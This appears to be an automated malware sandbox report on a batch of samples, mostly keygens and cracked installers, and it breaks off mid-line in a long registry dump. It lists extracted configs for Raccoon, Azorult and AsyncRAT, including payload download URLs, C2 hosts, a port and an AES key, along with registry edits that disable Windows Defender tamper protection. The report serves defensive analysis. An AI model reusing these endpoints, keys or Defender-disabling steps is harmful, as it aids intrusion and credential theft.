Overview
overview
10Static
static
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
4Resubmissions
18/11/2020, 14:18 UTC
201118-dj27sn3f52 1018/11/2020, 13:42 UTC
201118-1arz86e7w6 1018/11/2020, 13:38 UTC
201118-n8jh228ctn 10Analysis
-
max time kernel
1802s -
max time network
1815s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18/11/2020, 13:42 UTC
Static task
static1
Behavioral task
behavioral1
Sample
2019-09-02_22-41-10.bin.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
31.bin.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
3DMark 11 Advanced Edition.bin.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.bin.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral6
Sample
DiskInternals_Uneraser_v5_keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
ForceOp 2.8.7 - By RaiSence.bin.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
HYDRA.bin.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
Keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
LtHv0O2KZDK4M637.bin.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
OnlineInstaller.bin.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.bin.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.bin.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
api.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10v20201028
Behavioral task
behavioral18
Sample
good.bin.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
infected dot net installer.bin.exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
update.bin.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
vir1.xls
Resource
win10v20201028
Behavioral task
behavioral22
Sample
xNet.dll
Resource
win10v20201028
Behavioral task
behavioral23
Sample
1.bin.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
VPN/VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
VPN/xNet.dll
Resource
win10v20201028
Behavioral task
behavioral26
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
General
Malware Config
Extracted
http://rbcxvnb.ug/zxcvb.exe
http://rbcxvnb.ug/zxcvb.exe
Extracted
http://zxvbcrt.ug/zxcvb.exe
http://zxvbcrt.ug/zxcvb.exe
Extracted
http://bit.do/fqhHT
http://bit.do/fqhHT
Extracted
http://bit.do/fqhJv
http://bit.do/fqhJv
Extracted
http://bit.do/fqhJD
http://bit.do/fqhJD
Extracted
http://pdshcjvnv.ug/zxcvb.exe
http://pdshcjvnv.ug/zxcvb.exe
Extracted
raccoon
c6f4c67877b4427c759f396ca4c1dff4761d3cc9
-
url4cnc
https://telete.in/brikitiki
Extracted
azorult
http://195.245.112.115/index.php
Extracted
asyncrat
0.5.7B
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
AsyncMutex_6SI8OkPnk
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral9/memory/2424-231-0x0000000000400000-0x000000000040C000-memory.dmp disable_win_def behavioral9/memory/2424-232-0x000000000040616E-mapping.dmp disable_win_def behavioral9/memory/3312-248-0x0000000000400000-0x0000000000408000-memory.dmp disable_win_def behavioral9/memory/3312-249-0x0000000000403BEE-mapping.dmp disable_win_def behavioral9/files/0x000200000001ab90-271.dat disable_win_def behavioral9/files/0x000200000001ab90-270.dat disable_win_def behavioral9/memory/3432-794-0x000000000040616E-mapping.dmp disable_win_def behavioral9/memory/6040-788-0x0000000000403BEE-mapping.dmp disable_win_def behavioral9/files/0x000400000001abab-830.dat disable_win_def behavioral9/files/0x000400000001abab-829.dat disable_win_def -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Async RAT payload 3 IoCs
resource yara_rule behavioral9/memory/4164-221-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral9/memory/4164-222-0x000000000040C76E-mapping.dmp asyncrat behavioral9/memory/3672-720-0x000000000040C76E-mapping.dmp asyncrat -
ModiLoader First Stage 2 IoCs
resource yara_rule behavioral9/memory/4180-280-0x0000000002120000-0x0000000002130000-memory.dmp modiloader_stage1 behavioral9/memory/5868-707-0x0000000002260000-0x0000000002270000-memory.dmp modiloader_stage1 -
Blocklisted process makes network request 6 IoCs
flow pid Process 22 4088 powershell.exe 23 1528 powershell.exe 24 3608 powershell.exe 28 4088 powershell.exe 29 1528 powershell.exe 30 3608 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 35 IoCs
pid Process 504 Keygen.exe 5024 mkx.exe 5116 txi.exe 5104 pvr.exe 4468 zVhjgfutyFD.exe 4476 HuytgfGDFwer.exe 4272 mkx.exe 4652 zVhjgfutyFD.exe 4668 HuytgfGDFwer.exe 3560 3glqQ5zu6q.exe 4180 FcIiEO8Bol.exe 3764 Zfog5KVMBE.exe 4004 SmMNW0P9JH.exe 2120 3glqQ5zu6q.exe 3960 3glqQ5zu6q.exe 4164 3glqQ5zu6q.exe 1328 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 3312 SmMNW0P9JH.exe 4924 vokybpfg.exe 5500 axcjgfhwvvas.exe 5520 txi.exe 3060 oscjgfhwvvas.exe 3100 axcjgfhwvvas.exe 4360 Q0ASSF3gqn.exe 5868 eJZoW1GjJt.exe 4776 tdwmwhz8zi.exe 6000 1nONCENDZY.exe 3672 Q0ASSF3gqn.exe 5044 oscjgfhwvvas.exe 6048 tdwmwhz8zi.exe 4512 tdwmwhz8zi.exe 6040 1nONCENDZY.exe 3432 tdwmwhz8zi.exe 6092 wmimpxhi.exe -
Modifies Installed Components in the registry 2 TTPs
-
Loads dropped DLL 22 IoCs
pid Process 4272 mkx.exe 4668 HuytgfGDFwer.exe 4668 HuytgfGDFwer.exe 4668 HuytgfGDFwer.exe 4272 mkx.exe 4272 mkx.exe 4272 mkx.exe 4272 mkx.exe 4272 mkx.exe 4272 mkx.exe 4272 mkx.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5044 oscjgfhwvvas.exe 5044 oscjgfhwvvas.exe 5044 oscjgfhwvvas.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features SmMNW0P9JH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" SmMNW0P9JH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1nONCENDZY.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Klfn = "C:\\Users\\Admin\\AppData\\Local\\nflK.url" FcIiEO8Bol.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini txi.exe File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini mkx.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe -
Suspicious use of SetThreadContext 12 IoCs
description pid Process procid_target PID 5024 set thread context of 4272 5024 mkx.exe 104 PID 4468 set thread context of 4652 4468 zVhjgfutyFD.exe 105 PID 4476 set thread context of 4668 4476 HuytgfGDFwer.exe 106 PID 3560 set thread context of 4164 3560 3glqQ5zu6q.exe 124 PID 3764 set thread context of 2424 3764 Zfog5KVMBE.exe 126 PID 4004 set thread context of 3312 4004 SmMNW0P9JH.exe 128 PID 5116 set thread context of 5520 5116 txi.exe 166 PID 5500 set thread context of 3100 5500 axcjgfhwvvas.exe 173 PID 4360 set thread context of 3672 4360 Q0ASSF3gqn.exe 180 PID 3060 set thread context of 5044 3060 oscjgfhwvvas.exe 190 PID 6000 set thread context of 6040 6000 1nONCENDZY.exe 197 PID 4776 set thread context of 3432 4776 tdwmwhz8zi.exe 200 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HuytgfGDFwer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString oscjgfhwvvas.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 1436 timeout.exe 3680 timeout.exe 2564 timeout.exe 3428 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe -
Kills process with taskkill 4 IoCs
pid Process 2844 taskkill.exe 956 taskkill.exe 4908 taskkill.exe 4560 taskkill.exe -
Modifies registry class 30 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" SearchUI.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance explorer.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "132483827320340134" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c100000000000002000000e4070b005600610067007200650061007200670020006e00700070007200660066000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000004f351c79babdd60100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e4070b004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c00000000000000000000000040971e79babdd60100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e4070a004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc760000000000000000000000005aa40d5557add60100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e4070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e4070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet 